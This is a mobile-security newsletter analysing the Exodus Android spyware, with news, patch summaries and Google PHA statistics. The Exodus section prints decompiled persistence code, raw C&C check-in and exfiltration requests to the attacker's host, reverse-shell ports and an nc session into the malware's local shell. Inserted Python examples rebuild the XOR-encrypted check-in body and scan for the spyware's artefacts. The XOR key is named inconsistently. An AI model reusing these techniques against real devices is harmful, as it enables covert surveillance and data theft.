
Bancontact Payconiq Company

SEPA Rulebooks Scheme Manuals Remote Domain 46D0 – Schedules 1, 2, and 3 – News 66 Mobile App Security Guidelines

Android, iOS Newsletter 66

Confidential

COPYRIGHT This document is confidential and protected by copyright. Its contents must not be disclosed or reproduced in any form whatsoever without the prior written consent of Bancontact Payconiq Company sa/nv. Except with respect to the limited license to download and print certain material from this document for non-commercial and personal use only, nothing contained in this document shall grant any license or right to use any of Bancontact Payconiq Company sa/nv’s proprietary material.

AUTHORS This monthly newsletter is written by NVISO Labs, experts in , on behalf of Bancontact Company sa/nv.

ABOUT NVISO

NVISO is a consultancy firm exclusively focusing on IT security. NVISO has a very clear sector focus with several references in the financial and governmental sectors. The Research and Development department of NVISO is NVISO Labs, whose goals are to allow our people to increase their skills and knowledge, to come up with innovative service offerings, to contribute to the security community, and to give valuable insights to our clients. The fundamental values of NVISO are client satisfaction, focus, entrepreneurship, innovation, and ability to adapt. Our mission is to be an innovative and respected partner for our clients. For more information, we are happy to refer you to our website: https://www.nviso.be. If you want to stay up to date with our latest research and other activities of NVISO Labs, we refer you to our blog: https://blog.nviso.be

Newsletter 66 Copyright Bancontact Payconiq Company nv/sa Page 2 of 22


Table of Contents

Table of Contents 3
1 Summary of security impacts 4
2 Vulnerabilities & Malware 5
2.1 iOS Malware 5
2.2 Android Malware 6
    Exodus 6
3 Case study – Android Security Transparency Report 12
3.1 Potential Harmful Applications (PHAs) 12
3.2 Percentage of devices with PHA by market segment 13
3.3 Percentage of devices with PHA by Android version 13
3.4 Percentage of devices with PHA by top countries 14
3.5 Percentage of PHA installs by market segment 14
3.6 Percentage of PHA installs by categories 15
3.7 Google Play Protect 16
3.8 Conclusion 16
4 Security updates 17
4.1 iOS security update 17
4.2 Android security update 17
5 Security news 18
5.1 Mobile security news 18
    Face unlock feature of Samsung Galaxy S10 not foolproof 18
    Google implements ‘while-app-in-use’ location tracking 18
    High-risk vulnerability on Android devices could steal personal data 18
    Preinstalled Android apps often not as innocent as users might think 18
5.2 General security news 19
    Android trojan Gustuff could target over 100 global banking apps 19
    Comcast mobile phone service sets same PIN for all accounts 19
    Major Android apps sharing data with Facebook 20
    New iOS scam collecting Facebook credentials 20
    Facebook app’s logging passwords in plaintext 20
6 Statistics 21
6.1 OS market shares 21
6.2 iOS 21
6.3 Android 22


1 Summary of security impacts

In April, two types of Android malware were discovered, while no new security vulnerabilities were discovered on iOS. The first newly discovered Android malware, dubbed Exodus, does not target banking applications directly but could still have some impact, since it has a quite extensive and advanced list of data collection and exfiltration capabilities. This information could later be used to perform a targeted attack on infected devices with banking applications installed. Though only recently discovered, the malware may have been active since 2016, targeting Italian mobile users. The second malware, Gustuff, targets more than 100 international banks, 32 cryptocurrency apps and popular ecommerce marketplaces. Gustuff infects Android devices through SMS messages containing a link to a malicious APK. Afterwards, it spreads itself by sending the same malicious SMS to the device’s contact list. It abuses Android’s Accessibility Service to automatically fill in fields in legitimate banking and cryptocurrency apps. However, no technical details have been disclosed by the researchers; therefore we have listed it in the general security news section for the moment.

Even though no new iOS vulnerabilities were found, Apple did fix 51 vulnerabilities in their major 12.2 iOS update. Most of the vulnerabilities were related to WebKit, where the most critical one allowed an attacker to execute arbitrary code, disclose sensitive information and perform cross-site scripting attacks by convincing a victim to open a malicious file. Android also fixed some important vulnerabilities in their monthly security update. The update fixes 89 vulnerabilities spread across several components. The most critical issue allowed a remote attacker to gain arbitrary code execution within a privileged process by simply having the victim open a malicious media file.

The case study of this month focuses on the Android Security Transparency Report, a study performed by the Android team on Potentially Harmful Applications or PHAs.


2 Vulnerabilities & Malware

2.1 iOS Malware

No new malware was identified for iOS.


2.2 Android Malware

Exodus spyware

Overall risk: Medium Impact: High Likelihood: Low

Summary

Researchers at Security Without Borders identified a new Android spyware dubbed Exodus which supposedly infected a few hundred devices through the Google Play Store from 2016 to 2019. The spyware is composed of two stages. The first stage is distributed through a number of malicious apps that include a dropper, while the second stage contains the main data collection and exfiltration capabilities. Based on available Google Play Store statistics, all the dropper-containing apps have a few dozen installs, while one has over 350 installs. Since the dropper-containing apps disguise themselves as originating from Italian mobile operators, the majority of all victims are located in Italy. Other observations, such as decompiled source code, very specific XOR keys and a favicon, link the spyware to an Italian company creating video surveillance systems.

Since the spyware only spreads through the Google Play Store targeting Italian users, the likelihood of being infected is low. However, once the spyware gains access to a mobile device it can launch an extensive list of data collection and exfiltration techniques, including a reverse shell. Therefore, we rate the impact as high.

Details

The Exodus spyware is composed of two stages called Exodus One and Exodus Two. The first stage acts as a dropper and is contained in several malicious apps which made it to the Google Play Store over the course of two years. The apps remained available on the Google Play Store and were re-uploaded once they were removed. All the droppers had one characteristic in common: they disguised themselves as an unspecified Italian mobile operator.


Figure 1: Exodus One dropper disguising Italian mobile operator apps (source)


Exodus One collects some basic information about the infected device and sends it back to the Command & Control server (C&C). Depending on the version and variant of Exodus One, it communicates with a different C&C server. However, they all follow the same process for exfiltrating the basic device information. The following POST request is sent to the server, containing the app package name in the User-Agent header, the IMEI number and an encrypted body:

    POST /eddd0317-2bdc-4140-86cb-0e8d7047b874 HTTP/1.1
    User-Agent: it.promofferte:[REDACTED]
    Content-Type: application/octet-stream
    Content-Length: 256
    Host: 54.71.249.137
    Connection: Keep-Alive
    Accept-Encoding: gzip

    .....,Q... N.v..us.R...... /...\D..5p..q ...... 4 [REDACTED] gl.O..Y.Q..)3...7K.:(..5...w...... L.....p.L2...... _jK...... g}...15...... r.x.x!.....?..O.z......

    HTTP/1.1 200 OK
    Server: nginx/1.4.6 (Ubuntu)
    Date: [REDACTED]
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Content-Encoding: gzip

    358fde5fe8f91b132636a6d5a7148070

Looking into the source code, the encrypted body is composed of the concatenation of the following identifiers: deviceId, lineNumber, subscriberId, networkOperatorName, networkType and simState. Afterwards, the concatenated string is XOR encrypted with the static key ‘Kjk1MmphFG’. Based on the information sent to the C&C server, the attackers could decide whether or not to push the second stage of the spyware. After some time, the dropper made another POST request to the C&C server, to which the server responded with the second stage of the Exodus spyware, Exodus Two.

Exodus Two is packaged as a jar inside a larger zip archive. In fact, the zip contains binaries of the malware for different architectures: i686, arm, and arm64. The jar itself (mike.jar), implementing the main data exfiltration mechanisms, is dynamically loaded and executed by Exodus One. Once executed, Exodus exploits a feature of Huawei phones for configuring the power-saving options of running applications. By performing SQL queries directly on the SQLite database of Huawei’s system manager, the spyware can keep itself running even when the device is locked (decompiled code as published by the researchers; v1 holds the spyware’s own package name):

    if ( !func_sqlite_loaddb((int)"/data/data/com.huawei.systemmanager/databases/Optimize.db", (int)&db_handle) )
    {
      /* mark the package as user-protected and whitelisted for background execution */
      sprintf(&s, "INSERT INTO protectedapps (package_name,list_type) VALUES ('%s','1')", v1, 0);
      func_sqlite_exec(db_handle, &s, 0, 0, &v4);
      sprintf(&s, "DELETE FROM backgroundwhiteapps WHERE package_name='%s'", v1);
      func_sqlite_exec(db_handle, &s, 0, 0, &v4);
      sprintf(&s, "INSERT INTO backgroundwhiteapps (package_name) VALUES ('%s')", v1);
      func_sqlite_exec(db_handle, &s, 0, 0, &v4);
      func_sqlite_free(v4);
    }
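As an added example (not code from the newsletter or from the Security Without Borders analysis), the following Python rebuilds the Exodus One check-in body as described above and shows how an analyst recovers the plaintext from a captured body using the static key. The identifier values are constructed, and the example assumes the identifiers are concatenated without a separator, which the text does not specify.

```python
# Added example: Exodus One check-in body construction and recovery.
# Not from the newsletter; the separator-less concatenation is an assumption.
from typing import Optional

XOR_KEY = b"Kjk1MmphFG"  # static key quoted in the analysis

# Identifier order as listed in the text.
FIELDS = ("deviceId", "lineNumber", "subscriberId",
          "networkOperatorName", "networkType", "simState")


def xor_repeating(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """XOR every byte with the repeating key. Encrypts and decrypts alike."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_checkin_body(info: dict) -> bytes:
    """Concatenate the six identifiers in order and XOR them with the static key."""
    plain = "".join(str(info[f]) for f in FIELDS).encode("ascii")
    return xor_repeating(plain)


def decrypt_checkin_body(body: bytes) -> Optional[str]:
    """Return the recovered text if it is printable ASCII, else None.

    Because the key is static, no secret is needed to read a captured body.
    'Printable after XOR' is a cheap test that an octet-stream POST body is an
    Exodus One check-in rather than unrelated binary data.
    """
    plain = xor_repeating(body)
    if not plain or not all(32 <= c < 127 for c in plain):
        return None
    return plain.decode("ascii")


# Constructed sample device info (not real identifiers).
SAMPLE_INFO = {
    "deviceId": "358000000000000",
    "lineNumber": "+390000000000",
    "subscriberId": "222000000000000",
    "networkOperatorName": "ExampleOperator",
    "networkType": "13",
    "simState": "5",
}

if __name__ == "__main__":
    body = build_checkin_body(SAMPLE_INFO)
    print("encrypted body (hex):", body.hex())
    print("recovered plaintext :", decrypt_checkin_body(body))
```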


In order to remove traces, Exodus Two attempts to remove itself from the power usage statistics in a similar fashion:

    if ( !func_sqlite_loaddb((int)"/data/data/com.huawei.systemmanager/databases/stusagestat.db", (int)&db_handle) )
    {
      /* register the package as a protected key process in the usage-statistics database */
      sprintf(&s, "REPLACE INTO default_value_table (pkg_name,control,protect,keytask) VALUES ('%s',0,2,0)", v1, 0);
      func_sqlite_exec(db_handle, &s, 0, 0, &v4);
      sprintf(&s, "DELETE FROM st_key_procs_table WHERE st_key_process='%s'", v1);
      func_sqlite_exec(db_handle, &s, 0, 0, &v4);
      sprintf(&s, "INSERT INTO st_key_procs_table (st_key_process) VALUES ('%s')");
      func_sqlite_exec(db_handle, &s, 0, 0, &v4);
      sprintf(&s, "REPLACE INTO st_protected_pkgs_table (pkg_name,is_checked) VALUES ('%s',1)", v1);
      func_sqlite_exec(db_handle, &s, 0, 0, &v4);
      func_sqlite_free(v4);
    }

Data exfiltration

Exodus Two offers the following wide range of data collection and exfiltration capabilities:

• Retrieve a list of installed applications.
• Record surroundings using the built-in microphone.
• Retrieve the browsing history and bookmarks from Chrome and SBrowser (the browser shipped with Samsung phones).
• Extract events from the Calendar app.
• Extract the calls log.
• Record phone calls audio in 3gp format.
• Take pictures with the embedded camera.
• Collect information on surrounding cellular towers (BTS).
• Extract the address book.
• Extract the contacts list from the Facebook app.
• Extract logs from Facebook Messenger conversations.
• Take a screenshot of any app in foreground.
• Extract information on pictures from the Gallery.
• Extract information from the GMail app.
• Dump data from the IMO messenger app.
• Extract call logs, contacts and messages from the Skype app.
• Retrieve all SMS messages.
• Extract messages and the key from the Telegram app.
• Dump data from the Viber messenger app.
• Extract logs from WhatsApp.
• Retrieve media exchanged through WhatsApp.
• Extract the Wi-Fi network's password.
• Extract data from the WeChat app.
• Extract current GPS coordinates of the phone.


Retrieving this data from the system often does not require root privileges. However, where root privileges are required, Exodus Two includes a binary in the zip archive which takes care of privilege escalation. Upon execution, the binary, called ‘rootdaemon’, attempts to root the device using the well-known DirtyCow exploit (https://dirtycow.ninja). Afterwards, the main executable can connect to and interact with the ‘rootdaemon’ through various TCP ports bound on localhost. Each local port is responsible for a different data collection capability which requires root privileges. For example, connecting to port 6209 on localhost will initiate the Telegram extraction service.

    tcp        0      0 0.0.0.0:6201            0.0.0.0:*               LISTEN
    tcp        0      0 0.0.0.0:6205            0.0.0.0:*               LISTEN
    tcp        0      0 0.0.0.0:6209            0.0.0.0:*               LISTEN
    tcp        0      0 0.0.0.0:6211            0.0.0.0:*               LISTEN
    tcp        0      0 0.0.0.0:6212            0.0.0.0:*               LISTEN

Once mike.jar has acquired the data extracted by the rootdaemon, it is XOR encrypted and stored in the .lost+found folder on the device’s SD card, in a file whose name contains the extraction date and the IMEI number. For example:

    /storage/emulated/0/.lost+found/0BBDA068-9D27-4B55-B226-299FCF2B4242/DD_MM_2019_HH_mm_ss_XXXXXXXXXXXXX.txt.crypt

Eventually, the data collected in the .lost+found folder is sent to the C&C server using a PUT request:

    PUT /7d2a863e-5899-4069-9e8e-fd272896d4c7/A35081BD-4016-4C35-AA93-38E09AF77DBA.php HTTP/1.1
    User-Agent: it.promofferte:[REDACTED]
    DETAILS: {"date":"[REDACTED]","imei":"[REDACTED]","filenameb64":"[REDACTED]\u003d\u003d","filepathb64":"[REDACTED]\u003d","fileDirectoryb64":"[REDACTED]\u003d","uploadType":"WIFIPASSWORD","encrypted":true}
    Content-Type: application/octet-stream
    Content-Length: 277
    Host: ws.my-local-weather.com
    Connection: Keep-Alive
    Accept-Encoding: gzip

    l.9TqRuosV..~.:. ...` [REDACTED] ....s)Sp.^...5z..d0pRu

    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 18 Jan 2019 15:53:40 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Content-Encoding: gzip

    OK

Local and Remote shells

The Exodus spyware not only contains an extensive list of data collection and exfiltration capabilities but also offers the attackers a reverse shell connecting back to the C&C server. Immediately after the mike.jar of Exodus Two is executed, it checks that no other instance of itself is already running and that port 6842 is still available. If so, the spyware attempts to create a reverse shell (/system/bin/sh) to the C&C server on port 22011.


Figure 2: Exodus spyware initiating a reverse shell (source)

Although most of the data sent to the C&C server is encrypted, the reverse shell is set up without any encryption, making it vulnerable to man-in-the-middle attacks. On top of opening a reverse shell to the C&C server, the malware also binds a local shell on 0.0.0.0:6842. While this allows the malware to execute various commands on the device, it also opens an attack vector for other attackers on the same network:

    user@laptop:~$ nc 192.168.1.99 6842 -v
    Connection to 192.168.1.99 6842 port [tcp/*] succeeded!
    u0_a114@hammerhead:/ $ id
    id
    uid=10114(u0_a114) gid=10114(u0_a114) groups=1015(sdcard_rw),1028(sdcard_r),3003(inet),50114(all_a114) context=u:r:untrusted_app:s0
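As an added example (not code from the newsletter or from the Exodus analysis), the following Python triages two of the host-side artefacts described above: listening sockets on the rootdaemon service ports and the 6842 local shell (plus established connections to the 22011 reverse-shell port), and encrypted dump files in the SD card's .lost+found folder. The netstat lines and file paths are constructed; port numbers alone are a weak indicator, so hits should be confirmed against the owning process before any conclusion is drawn.

```python
# Added example: triage of Exodus host artefacts from netstat output and file paths.
# Not from the newsletter; sample input below is constructed.
import re
from typing import Dict, List

# Ports quoted in the analysis: rootdaemon services and the 6842 local shell.
EXODUS_LISTEN_PORTS = {6201, 6205, 6209, 6211, 6212, 6842}
# Port the reverse shell connects back to, as quoted in the analysis.
EXODUS_REVERSE_SHELL_PORT = 22011

# Matches lines such as: tcp  0  0 0.0.0.0:6209  0.0.0.0:*  LISTEN
NETSTAT_RE = re.compile(
    r"^tcp6?\s+\d+\s+\d+\s+(?P<laddr>\S+):(?P<lport>\d+)\s+"
    r"(?P<raddr>\S+):(?P<rport>\S+)\s+(?P<state>\S+)"
)

# Matches the dump naming scheme: .lost+found/<UUID>/DD_MM_YYYY_HH_mm_ss_<IMEI>.txt.crypt
DUMP_RE = re.compile(
    r"/\.lost\+found/[0-9A-Fa-f-]{36}/"
    r"\d{2}_\d{2}_\d{4}_\d{2}_\d{2}_\d{2}_(?P<imei>\d{14,16})\.txt\.crypt$"
)


def suspicious_sockets(netstat_lines: List[str]) -> List[Dict[str, object]]:
    """Flag listeners on the Exodus ports and connections to the reverse-shell port."""
    hits: List[Dict[str, object]] = []
    for raw in netstat_lines:
        line = raw.strip()
        m = NETSTAT_RE.match(line)
        if not m:
            continue  # not a TCP socket line (headers, udp, unix sockets)
        lport = int(m["lport"])
        rport = m["rport"]
        if m["state"] == "LISTEN" and lport in EXODUS_LISTEN_PORTS:
            reason = "local shell listener" if lport == 6842 else "rootdaemon service port"
            hits.append({"port": lport, "reason": reason, "line": line})
        elif (m["state"] == "ESTABLISHED" and rport.isdigit()
              and int(rport) == EXODUS_REVERSE_SHELL_PORT):
            hits.append({"port": int(rport), "reason": "connection to reverse-shell port",
                         "line": line})
    return hits


def suspicious_dump_files(paths: List[str]) -> List[Dict[str, str]]:
    """Return paths that follow the .lost+found dump naming scheme, with the IMEI in the name."""
    found = []
    for path in paths:
        m = DUMP_RE.search(path)
        if m:
            found.append({"path": path, "imei": m["imei"]})
    return found


# Constructed sample netstat output: three Exodus listeners, adb on 5037 (benign),
# one connection to the reverse-shell port and one ordinary HTTPS connection.
SAMPLE_NETSTAT = """\
tcp        0      0 0.0.0.0:6201            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:6209            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:6842            0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:5037          0.0.0.0:*               LISTEN
tcp        0      0 192.168.1.99:41234      203.0.113.10:22011      ESTABLISHED
tcp        0      0 192.168.1.99:41235      203.0.113.20:443        ESTABLISHED
""".splitlines()

# Constructed sample file listing (UUID, timestamp and IMEI are made up).
SAMPLE_PATHS = [
    "/storage/emulated/0/.lost+found/0BBDA068-9D27-4B55-B226-299FCF2B4242/"
    "18_01_2019_15_53_40_358000000000000.txt.crypt",
    "/storage/emulated/0/DCIM/Camera/IMG_0001.jpg",
    "/storage/emulated/0/.lost+found/notes.txt",
]

if __name__ == "__main__":
    for hit in suspicious_sockets(SAMPLE_NETSTAT):
        print(f"[socket] port {hit['port']}: {hit['reason']}")
    for dump in suspicious_dump_files(SAMPLE_PATHS):
        print(f"[file]   {dump['path']} (IMEI {dump['imei']})")
```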

Origination

Because the first stage of the Exodus spyware was contained in apps on the Google Play Store disguised as Italian mobile operators, it is likely that an Italian actor is behind the whole malware. This assumption is reinforced by the decompiled classes.dex file, which contains Italian log messages (the one below reads, in English, “Added the mundizza files. Upload queue size {}”):

    a("MUNDIZZA", "09081427-FE30-46B7-BFC6-50425D3F85CC", ".*", false);
    this.b.info("UPLOADSERVICE Aggiunti i file mundizza. Dimensione coda upload {}", Integer.valueOf(this.c.size()));

‘Mundizza’ is a word from the local dialect of Catanzaro, a city in the south of Italy. Moreover, the XOR key used in Exodus One is ‘Rino Gattuso’, a famous footballer originating from the region around Catanzaro. The TLS certificate assigned to the domain of the C&C server (https://ws.my-local-weather.com) is a self-signed certificate which has been used on a dozen other IP addresses. All these IP addresses behaved the same way when connecting to port 443, showing a basic prompt. Supposedly, these are all different clones of the C&C server.


The favicon of these webpages can be linked to the Italian company eSurv, which is in fact located in Catanzaro. eSurv is a company creating video surveillance systems, including CCTV management systems, license plate recognition software and surveillance drones.

Figure 3: eSurv login panel (source)

All these observations might link eSurv to the development and distribution of the Exodus spyware. According to the WHOIS information, the C&C server has been active since at least April 2017 and impersonates a legitimate weather service called ‘AccuWeather’.

Mitigation

The root exploits included in these types of malware are often well-known vulnerabilities that have already been patched in recent Android versions. Therefore we recommend that developers only support recent Android versions in their apps (see last month’s edition 65 of this newsletter for a deep-dive case study on Android version support in apps). In addition, developers can implement root detection to warn users when the application is started on a rooted device.

According to Google, all droppers for the Exodus spyware have been taken down from the Google Play Store. However, we recommend remaining cautious when installing applications, even when they originate from a trusted store like the Google Play Store. The following characteristics might indicate that a malicious application has still found its way into the Google Play Store:

• The application has only just been uploaded to the Google Play Store.
• A (very) small number of downloads.
• A (very) small number of reviews/stars which are artificially high.
• Upon installation, the application asks for permissions which it normally should not require.

The spyware uses DirtyCow to perform privilege escalation and unlock a dozen data collection and exfiltration mechanisms requiring root privileges. We recommend that users keep their devices up to date at all times in order to have the patches against the DirtyCow exploit.

Source: https://securitywithoutborders.org/blog/2019/03/29/exodus.html


3 Case study – Android Security Transparency Report

Android is prioritizing the security of its OS and, as part of this effort, the Android team released the Android Security Transparency Report. Below you will find a summary of this report as well as a quick look at its most important parts. Android is by far the mobile OS with the largest user base, as it is installed on over 2 billion devices worldwide. The Android team is committed to safeguarding the privacy and security of each of its users. The report focuses on the efforts made to reduce the number of Potentially Harmful Applications (PHAs) installed.

3.1 Potential Harmful Applications (PHAs)

Google uses the term Potentially Harmful Application (PHA) for apps that pose a potential security risk, as they found the term “malware” not well enough defined. PHA classifications change over the years to keep up with the current ecosystem. Below you will find an explanation of the different categories within PHAs:

• Backdoors
• Commercial Spyware
• Data Collection
• Denial of Service
• Hostile Downloader
• Mobile Billing Fraud
• SMS Fraud
• Call Fraud
• Toll Fraud
• Non-Android Threat
• Phishing
• Privilege Escalation
• Spam
• Spyware
• Trojan

While most of these categories are self-explanatory, we will dive into a few of them. A backdoor, according to Google, is defined as follows: “An application that allows the execution of unwanted, potentially harmful, remote-controlled operations on a device.”1 It is a description of how potentially harmful actions can occur. Commercial spyware apps are classified as such when the app is found to send personally identifiable data to a party other than the PHA provider. Data Collection is a rather vague category; Google assigns it when an application collects any of the following information without user consent:

• Information about installed applications
• Information about third-party accounts
• Names of files on the device

Toll Fraud is another classification that needs a bit of explanation. It is fraud that tricks users into subscribing to or purchasing content via their mobile phone bill. An example of such fraud is making the victim click a button in a silently loaded transparent web view in order to initiate a recurring subscription.

1 https://source.android.com/security/reports/Google_Android_Security_PHA_classifications.pdf


These categories can change to match the current mobile ecosystem. Google transparently reports on any changes in the categories in their quarterly security transparency report.

3.2 Percentage of devices with PHA by market segment

Android launched Google Play Protect in 2017 to improve the security of Android devices across the world. Play Protect is designed to detect and remove PHAs from certified Android devices regardless of where the app was installed from. Below you will see the percentage of Android devices with Google Play Protect enabled that have one or more PHAs installed2. Keep in mind that 1% still means that around 10 million devices around the world have PHAs installed.

Figure 4 - Percentage of Android devices with Google Play Protect enabled that have one or more PHAs installed

3.3 Percentage of devices with PHA by Android version

The Android versions in the charts below cover approximately 90% of the Android ecosystem. The graphs show the percentage of devices with at least one PHA installed, by Android version. What is interesting here is that the percentage of devices with PHAs has increased since the last period across all OS versions. This could mean that there are more PHAs, or that Google Play Protect is being enabled on more devices, or both.

Figure 5 - Percentage of devices with at least one PHA installed by Android version, Oct-Dec vs Jul-Sept 2018

2 All pictures in this section are copied from https://transparencyreport.google.com/android-security/overview?hl=en


    OS            JUL 2018 – SEP 2018    OCT 2018 – DEC 2018
    KitKat        0.386%                 0.415%
    Lollipop      0.594%                 0.639%
    Marshmallow   0.509%                 0.665%
    Nougat        0.323%                 0.397%
    Oreo          0.159%                 0.229%
    Pie           0.064%                 0.206%

3.4 Percentage of devices with PHA by top countries

The chart below displays PHAs found in the top 10 countries with the most Android devices. Indonesia, India and the US have the highest percentage of PHA-infected devices.

Figure 6 - Percentage of devices per top 10 country, with at least one PHA

3.5 Percentage of PHA installs by market segment

Below you will find a representation of install rates broken down by quarter. As you can see, the number of PHAs being installed from outside the Google Play Store is decreasing. It shows that the efforts made by Google to improve the security of the Android platform are paying off.


Figure 7 - Quarterly PHA install rates for Google Play and outside of Google Play

3.6 Percentage of PHA installs by categories

The graph below shows the percentage of PHAs per category. The numbers include PHAs installed from both the Google Play Store and from other application stores. When we compare Q3 to Q4 2018, we see that Trojans are becoming more common, with an increase from 0.00036% to 0.02003%. To put it in more manageable numbers, it is an increase from roughly 3500 to 200.000 Trojan PHA installs. Click fraud PHAs, however, have seriously declined in comparison with the last period.

Figure 8 - top PHA categories broken down by percentage against overall app installs, Oct-Dec vs Jul-Sept 2018


3.7 Google Play Protect

Google Play Protect detects and removes PHAs on Android devices by doing the following things:

• Periodic online and offline PHA scans.
• Automatically disabling or removing PHA threats.
• Uploading new apps to the cloud for scanning.
• Google Play Protect also uses SafetyNet Signal Detection3.
• Google Play Protect uses machine learning models to improve its algorithms.

3.8 Conclusion

In conclusion, Google is actively trying to improve the security of the Android platform. Introducing Google Play Protect has helped them improve the general security posture of the OS. It actively helps to improve the security of the Android landscape; furthermore, Google provides developers with good guidelines and active policies in order to ensure the protection and privacy of its users. By transparently reporting their findings, Google is keeping Android developers up to date on what is happening with PHAs and on how to protect their users’ data by following Google’s security guidelines.

3 SafetyNet Signal Detection is an API that allows developers to assess the device their app is running on. More info on this API can be found at: https://developer.android.com/training/safetynet/attestation


4 Security updates

4.1 iOS security update

On March 25th, Apple released their latest major update for their mobile devices: iOS 12.2. The update included a total of 51 security vulnerabilities. Most of the vulnerabilities are related to Apple’s web rendering engine, WebKit. One of the vulnerabilities (CVE-2019-8562) allowed an attacker to execute arbitrary code, disclose sensitive user information and perform cross-site scripting attacks by convincing a victim to open a malicious file. Another WebKit vulnerability (CVE-2019-6222) allowed malicious websites to access the microphone without notifying the user by displaying the ‘microphone is currently in use’ message. A logical bug in WebKit (CVE-2019-8503) enabled cross-origin attacks where a malicious webpage can execute scripts in the context of another site. Additionally, Apple patched six vulnerabilities in the iOS kernel. These vulnerabilities could allow an attacker to elevate privileges and even the system or corrupt the kernel memory. The full security update description can be found on https://support.apple.com/en-us/HT209599

4.2 Android security update

On April 5th, the Android development team released their security update in which 89 vulnerabilities were fixed. Eight vulnerabilities are related to privilege escalation, three vulnerabilities allowed an attacker to gain remote code execution, four vulnerabilities are linked to identity disclosure while all the others were given the N/A tag. The most severe critical vulnerability allowed a remote attacker to gain arbitrary code execution within a privileged process by simply making the victim open a malicious media file. Technical details of the vulnerability are currently not available. Google did not find any indication that the bugs have been exploited or abused in the wild. All other bugs were classified as high and have been patched. Most of the vulnerabilities were found in system and Qualcomm components. More information can be found on the April 2019 security bulletin: https://source.android.com/security/bulletin/2019-04-01


5 Security news

5.1 Mobile security news

Face unlock feature of Samsung Galaxy S10 not foolproof

The new Samsung Galaxy S10, released in March 2019, can easily be tricked in various ways. Showing a video of the owner in front of the camera unlocks the device. Also, the phone has a hard time distinguishing between siblings: security researcher Jane Wong was able to unlock her brother’s phone using her own face. Worst of all, some people were able to fool the face unlock feature by waving a still photo in front of the camera. This flaw comes as a surprise since previous Samsung phones, starting from the Galaxy S8, implement a more secure face unlocking mechanism which uses an IR LED and an extra front camera to scan your iris. While this technique is more reliable than a simple camera, it requires some space for extra hardware. Presumably Samsung cut the extra hardware in order to allow for super slim bezels.

Source: https://arstechnica.com/gadgets/2019/03/the-galaxy-s10s-face-unlock-fooled-by-pictures-siblings/

Google implements ‘while-app-in-use’ location tracking

In earlier versions of Android, it was only possible to either have apps track the user’s location at all times or to turn location tracking off completely. While this could be a convenient feature for some applications, vulnerabilities in these apps could leak your location data, causing concerns about your privacy and physical safety. Starting from Android Q, developers now have a new option to only track the location of users while their app is in use (i.e. when the app is in the foreground). For example, this could be useful when you are just looking for a nearby restaurant in a Yelp-like application. This new option brings Android in line with the location-tracking options in iOS.

Source: https://threatpost.com/google-location-tracking-apps/142882/

Location tracking in Android Q (source)

High-risk vulnerability on Android devices could steal personal data

Sergey Toshin, a security researcher at Positive Technologies, discovered a vulnerability in Android’s WebView, the component which allows web pages to be displayed in apps. The vulnerability could be exploited by clicking a link in the WebView to download an instant app. This instant app is a small ‘demo’ app which does not require any installation and runs in a native container with access to the device’s hardware. A malicious instant app could read information from the WebView, containing confidential data like browser history, logins and authentication tokens. The vulnerability was present for more than five years in all Android versions from 4.4 and up. However, after the researcher contacted Google in January, they quickly patched the bug.

Source: https://www.ptsecurity.com/ww-en/about/news/high-risk-vulnerability-in-android-devices-discovered-by-positive-technologies/

Preinstalled Android apps often not as innocent as users might think

Research conducted by the IMDEA Networks Institute revealed some interesting insights into the nature of the pre-installed apps on new Android phones. They scanned the of more than 2700 Android users in order to create a dataset of 82501 pre-installed apps. Surprisingly, many of these apps collect personal data like geolocation information, personal email, phone call metadata and contact details. Thanks to potential partnerships and deals by the vendor, these apps are often given custom permissions without informing the users. In many cases, the stolen data was sent directly to advertising companies.

Source: https://nakedsecurity.sophos.com/2019/03/27/preinstalled-android-software-is-pilfering-your-data-say-researchers/

5.2 General security news

Android trojan Gustuff could target over 100 global banking apps

Researchers at Group-IB discovered a new Android malware dubbed Gustuff targeting more than 100 international banks, 32 cryptocurrency apps and popular ecommerce marketplaces. The malware is designed as a trojan: once a device is infected, commands are sent from the C&C server to the infected device. The malware is able to read and send SMS messages, redirect all web traffic through a proxy, transfer files and reset the device. Initially, Gustuff infects Android devices through an SMS containing a link to a malicious APK. Afterwards, it spreads itself by sending the same malicious SMS to the device’s contact list. Gustuff abuses Android’s Accessibility Service to implement its unique feature, Automatic Transfer Systems (ATS). This functionality allows the malware to autofill fields in legitimate banking and cryptocurrency apps to speed up and scale up thefts. Additionally, the malware can send fake push notifications imitating legitimate applications. These notifications link either to a fake web page requesting banking details or to the legitimate application, where the ATS feature automatically fills in malicious payment details. The malware seems to be the successor of the AndyBot malware, which has been around since November 2017, targeting Android phones to steal money using fake websites disguised as the mobile apps of popular banks.

Source: https://www.group-ib.com/media/gustuff/

Comcast mobile phone service sets same PIN for all accounts Two years ago, Comcast launched its mobile service and allowed new customers to port their existing phone numbers from their previous carrier. To port a number, customers had to provide their Comcast account number and a PIN. To simplify the process, Comcast effectively removed the PIN by setting a default PIN of 0000 for all customers. As a result, an attacker who obtained a victim's Xfinity Mobile account number could easily hijack the victim's phone number. Some customers indeed reported that their numbers had been ported without their consent and that the attackers went on to commit identity theft. To fix the issue, Comcast changed its porting process, which now requires both the account number and the customer's current address. Source: https://nakedsecurity.sophos.com/2019/03/05/comcast-security-nightmare-default-0000-pin-on-everybodys-account/



Major Android apps sharing data with Facebook In December 2018, researchers at Privacy International revealed that several well-known Android apps were sharing data with Facebook the moment they were first launched. The data was sent even when the user was logged out of Facebook or had no Facebook account at all. This month they retested the affected apps and found that two thirds of them had fixed the issue and no longer share data with Facebook. However, some major apps, including Yelp and Duolingo, still do. Source: https://privacyinternational.org/blog/2758/guess-what-facebook-still-tracks-you-android-apps-even-if-you-dont-have-facebook-account

